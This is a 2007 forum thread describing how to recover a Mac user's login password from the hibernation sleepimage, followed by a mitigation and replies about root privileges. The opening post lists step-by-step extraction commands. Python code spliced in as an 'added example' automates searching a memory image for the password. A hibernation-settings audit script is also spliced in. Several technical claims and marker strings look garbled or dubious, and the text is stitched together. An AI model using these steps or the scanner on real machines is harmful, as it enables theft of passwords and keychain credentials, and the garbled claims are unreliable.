EDU: How to get a password from a Mac (and how to prevent it)

Discussion in 'OT Technology' started by mudder, Jun 21, 2007.

  1. mudder, New Member (joined Oct 31, 2004; location: ATX)
    This post is not for Mac Noobs. This is a very technical EDU with a lengthy intro. How you can use it to get a Mac's passwords is at the end. How you can prevent this (my hack) is also at the end.


    So I got bored the other day and wanted to find out how the new Mac USB police password cracker works. Essentially, it is a USB dongle that reads all keychain passwords without root or admin access. I programmed a USB FPGA capture device from NI to trace all USB activity from and to the USB device. What I found is that when you log in, your password is automatically loaded into RAM as a recent entry. I tried to flush the password out by using all the RAM and then swapping out, but it stays in there. I guess the Mac likes having your password in memory.

    So what you do is plug this USB device in and the first thing it does is copy /var/vm/sleepimage 16MB at a time and then searches using Terminal on the USB side (embedded Unix controller) to search for shel/bin/basusername and shel/bin/basshouldunmoun. If it isn't found (the sleepimage is the size of the amount of RAM you have), the next 16MB are copied until it is found. This reference has your password in hex before it. Unix converts it on the fly. Bingo, there's your password. All the dongle has to do at this point is type that into your keychain through Unix USB push commands and then it can grab the rest of your passwords.

    You can do this yourself in Terminal quite easily, but you'll need another Mac to host if you don't have admin access on the machine you're trying to crack.

    1. Open Terminal
    2. Boot the unknown-password machine into FireWire target mode
    3. Plug the FW target machine into your Mac with a known admin password.
    4. Use Blind (application) to reveal all files on Mac
    5. Go to var/vm/ on both your machine and the slave machine
    6. Move the sleepimage from the known password machine to any other folder
    7. Copy the sleepimage from the unknown machine to the known machine in the var/vm directory
    8. In Terminal, type: sudo strings -n 8 /var/vm/sleepimage | grep shel/bin/basusername
    9. The unknown password is returned in a few seconds. It will ask for your password. Enter your known password on the host machine.

    Ok, so that sucks. How do you disable it?

    Well, I tried to use secure virtual memory, but the password in RAM is excluded from the secure virtual memory (otherwise, the Mac would not be able to verify any password you entered without entering that password first, which would make an infinite circle... Essentially the password has to remain unencrypted since it is how the machine verifies any password entry).

    So how do you change this? Well, I just disabled the sleepimage. This is easy:

    1. In Terminal, sudo pmset -a hibernatemode 0; sudo nvram "use-nvramrc?"=false

    2. Restart
    3. rm /var/vm/sleepimage
    4. Then go to security in system preferences and enable secure virtual memory.
    5. Go back to terminal and type: pmset -g | grep hibernatemode
    6. If all went well, the response is hibernate mode 0. If it is instead hibernate mode 3, you messed something up.

    One warning here: Since we just disabled RAM -> HD indexing, if your machine loses power completely, it will not hibernate (deep sleep). It will just turn off (we removed the HD saved RAM state). This is how all Apples behaved prior to 2005.

    One added benefit: since you are no longer writing RAM data to HD on sleep and restart/shutdown, the machine sleeps, restarts, and shuts down much faster. Real fast. I love it!

    This advice is offered as is. If you do everything right, there is no risk. If you suck at typing or fuck anything up, bad things can happen. Proceed at your own risk!
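    As an added example that is not part of the original post: the `sudo strings -n 8 /var/vm/sleepimage | grep shel/bin/basusername` step above, written in Python so it can stream a RAM-sized image in chunks (as the post says the dongle does, 16MB at a time) and report the printable run that sits immediately before the marker, since the post says the secret is stored just ahead of that reference. The marker strings are copied verbatim from the post. The image produced by build_sample_image() is constructed in memory for illustration; the "hunter2-example" value, the decoy path and the chunk/overlap sizes are assumptions, not anything read from a real sleepimage. Whether a given OS X build really keeps the login password there is the post's claim; this code only shows how to find marker context in a large binary image.

```python
# Added example (not the original poster's code): locate a marker string in a
# memory/hibernation image and report the printable run just before it, which
# is the `strings -n 8 ... | grep` step from the post done programmatically.
import os
import re
import tempfile
from typing import Iterator, NamedTuple, Optional, Tuple

MARKER = b"shel/bin/basusername"      # copied verbatim from the post
MIN_LEN = 8                           # same threshold as `strings -n 8`
CHUNK = 16 * 1024 * 1024              # the post reads the image 16 MB at a time
OVERLAP = 4096                        # assumption: longest string expected before a marker


class Hit(NamedTuple):
    offset: int               # absolute byte offset of the marker in the image
    run: bytes                # printable run that contains the marker
    prev: Optional[bytes]     # printable run immediately before it, if any


def iter_strings(data: bytes, min_len: int = MIN_LEN) -> Iterator[Tuple[int, bytes]]:
    """Yield (offset, run) for each run of >= min_len printable ASCII bytes,
    i.e. what `strings -n min_len` prints, plus where each run starts."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for m in pattern.finditer(data):
        yield m.start(), m.group()


def find_marker(data: bytes, marker: bytes, min_len: int = MIN_LEN) -> Optional[Hit]:
    """Return the first run containing `marker` together with the run that
    precedes it (the post says the secret sits just ahead of the reference)."""
    prev = None
    for off, run in iter_strings(data, min_len):
        if marker in run:
            return Hit(off + run.index(marker), run, prev)
        prev = run
    return None


def scan_file(path: str, marker: bytes, chunk: int = CHUNK, overlap: int = OVERLAP) -> Optional[Hit]:
    """Stream a RAM-sized image chunk by chunk, carrying `overlap` bytes of the
    previous chunk so a marker or its preceding run that straddles a chunk
    boundary is still seen in full. Stops at the first hit, like the post's
    dongle, and reports the absolute file offset."""
    with open(path, "rb") as f:
        base = 0          # file offset of the start of the current chunk
        tail = b""        # carried-over bytes from the previous chunk
        while True:
            block = f.read(chunk)
            if not block:
                return None
            window = tail + block
            hit = find_marker(window, marker)
            if hit is not None:
                return Hit(base - len(tail) + hit.offset, hit.run, hit.prev)
            tail = window[-overlap:]
            base += len(block)


def build_sample_image(secret: bytes = b"hunter2-example") -> bytes:
    """Constructed stand-in for /var/vm/sleepimage: non-printable filler, a
    decoy path, then the secret and the marker laid out as the post describes.
    The secret and the decoy are assumptions for illustration only."""
    junk = b"\x00\x01\x7f\x80\xff\x1b" * 4000            # 24 KB with no printable runs
    decoy = b"/System/Library/CoreServices/loginwindow.app\x00"
    return (junk + decoy + junk
            + secret + b"\x00" + MARKER + b"\x00"
            + junk + b"shel/bin/basshouldunmoun\x00" + junk)   # second marker from the post


def demo(chunk: int = 8192, overlap: int = 1024) -> Optional[Hit]:
    """Write the sample image to a temp file and scan it with a small chunk
    size so the chunk/overlap handling is actually exercised."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(build_sample_image())
        path = tmp.name
    try:
        return scan_file(path, MARKER, chunk=chunk, overlap=overlap)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    hit = demo()
    if hit is None:
        print("marker not found")
    else:
        print(f"marker at offset {hit.offset}: run={hit.run!r} prev={hit.prev!r}")
```

    On a real image you would call scan_file("/var/vm/sleepimage", MARKER) as root. The overlap has to be at least as long as the longest string you expect to find ahead of the marker; otherwise a hit that lands just after a chunk boundary can come back with a truncated or missing prev, which is the boundary case the post's 16MB-at-a-time description glosses over.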
     
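    Added example, not part of the post: the verification at the end of the post (pmset -g | grep hibernatemode should show 0, and /var/vm/sleepimage should be gone) as a script, so the two conditions are checked rather than eyeballed. The pmset -g text inside is constructed to resemble the real output's one-setting-per-line section; exact keys and layout vary across OS X versions, so the parser is deliberately loose and the sample is an assumption, not captured output. sleepimage_present is passed in as a parameter so the check runs off a Mac; on one you would pass os.path.exists("/var/vm/sleepimage").

```python
# Added example (not from the post): script the post's final verification step
# so "hibernatemode 0" and the absence of /var/vm/sleepimage are checked
# rather than eyeballed. The pmset -g text below is constructed to resemble the
# real output (one "key   value" pair per line); exact keys vary by OS X version.
import re
from typing import Dict, List

SLEEPIMAGE = "/var/vm/sleepimage"
EXPECTED_HIBERNATEMODE = "0"       # value the post's steps should leave in place

# Constructed sample of `pmset -g` output before the change from the post.
SAMPLE_BEFORE = """\
Active Profiles:
Battery Power\t\t-1
AC Power\t\t-1*
Currently in use:
 sleep                10
 disksleep            10
 displaysleep         10
 hibernatemode        3
 hibernatefile        /var/vm/sleepimage
"""

# The same output after `sudo pmset -a hibernatemode 0` and a restart.
SAMPLE_AFTER = SAMPLE_BEFORE.replace("hibernatemode        3", "hibernatemode        0")

KV = re.compile(r"^\s*(\S+)\s+(\S+)\s*$")   # exactly two whitespace-separated tokens


def parse_pmset(text: str) -> Dict[str, str]:
    """Collect the 'key value' lines of pmset -g output into a dict. Section
    headers (ending in ':') and the profile table (three tokens) are skipped."""
    settings: Dict[str, str] = {}
    for line in text.splitlines():
        m = KV.match(line)
        if m and not line.rstrip().endswith(":"):
            settings[m.group(1)] = m.group(2)
    return settings


def audit(pmset_text: str, sleepimage_present: bool) -> List[str]:
    """Return findings; an empty list means both conditions from the post hold.
    `sleepimage_present` is supplied by the caller (os.path.exists(SLEEPIMAGE)
    on a real Mac) so this function itself has no macOS dependency."""
    findings: List[str] = []
    mode = parse_pmset(pmset_text).get("hibernatemode")
    if mode is None:
        findings.append("hibernatemode not reported by pmset -g")
    elif mode != EXPECTED_HIBERNATEMODE:
        findings.append(f"hibernatemode is {mode}, expected {EXPECTED_HIBERNATEMODE}")
    if sleepimage_present:
        findings.append(f"{SLEEPIMAGE} still exists; remove it and re-check")
    return findings


if __name__ == "__main__":
    for label, text, present in (("before", SAMPLE_BEFORE, True), ("after", SAMPLE_AFTER, False)):
        print(label, audit(text, present) or "OK")
```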
  2. EB, 2/24/08 (joined May 25, 2006; location: TEXAS)
    Cool. Little advanced for me though.

    I have used the OS X disc to change the root password though in the lab I used to work in. I always thought it was weird how easy it is to change passwords.
     
  3. mudder, New Member (joined Oct 31, 2004; location: ATX)
    The thing about this is it will tell you the password. So then you can access locked files, email, disk images, etc. This is of course assuming that the person uses the same password, but 99% of the time people use the same password for everything. That's the real power of it.
     
  4. agent0068, OT Supporter (joined Jun 28, 2002)
    (a) "your" hack is not new or novel. Googling even shows it being covered in Macworld
    (b) a *much* more trivial approach to breaking and entering a machine you have physical access to is to either:
    * boot off of the system CD
    * or, if it's a machine likely to still have Classic on it, boot into Classic
     
  5. Euclid, New Member (joined Apr 19, 2004; location: Nashville, TN)
    -rw------T 1 root wheel 2147483648 Jun 21 08:38 sleepimage

    I don't really see what the concern is, if the sleepimage file is only readable by root.
     
  6. agent0068, OT Supporter (joined Jun 28, 2002)
    it's bad because the root user shouldn't know other users' passwords on the machine
     
  7. Euclid, New Member (joined Apr 19, 2004; location: Nashville, TN)
    :hsugh:
     
  8. agent0068, OT Supporter (joined Jun 28, 2002)
    do you disagree with that?
     
  9. Dysfnctnl85, IT/Apple/Rotary/(D)SLR Crew (joined Dec 20, 2004; location: Fayetteville, Georgia)
    What's wrong with the root user knowing other users' passwords?
     
  10. agent0068, OT Supporter (joined Jun 28, 2002)
    then, for instance, the root user could read other users' keychains, probably gaining mail server passwords, Safari autofill passwords (e.g. bank accounts), and so on. that would be a very bad thing
     
  11. Dysfnctnl85, IT/Apple/Rotary/(D)SLR Crew (joined Dec 20, 2004; location: Fayetteville, Georgia)
    Is that not the point of "root" user? To have control over everything?
     
  12. agent0068, OT Supporter (joined Jun 28, 2002)
    good god no.

    control/administration of the machine is not the same as controlling every aspect of the users' use of the machine.

    root is more intended for tasks like software installs, support, maintenance, security, and such tasks involving the upkeep of the machine--sys admin sort of tasks. not for spying or identity theft. properly securing user passwords from prying eyes of the superuser is a step towards ensuring such boundaries are respected.
     
  13. Dysfnctnl85, IT/Apple/Rotary/(D)SLR Crew (joined Dec 20, 2004; location: Fayetteville, Georgia)
    Well said, thanks :bigthumb:.
     
  14. IcyHot4Life, Str8 Ballin' (joined Aug 2, 2002; location: Inquire Within)
    well said. agent0068 is the shit :cool: ex-Apple too, if I recall correctly...
     
  15. agent0068, OT Supporter (joined Jun 28, 2002)
    haha, thanks guys. and yea, Soundtrack Pro :)
     
  16. asshole, "dont eat yellow snow!" OT Supporter (joined Mar 20, 2005; location: everywhere..everyone has an asshole)
    Edit: too much info after reading what I wrote... you can PM me with questions. I've been writing Apple code since old-school OS 7 using old crappy apps called ResEdit and other good ones from CodeWarrior.
     
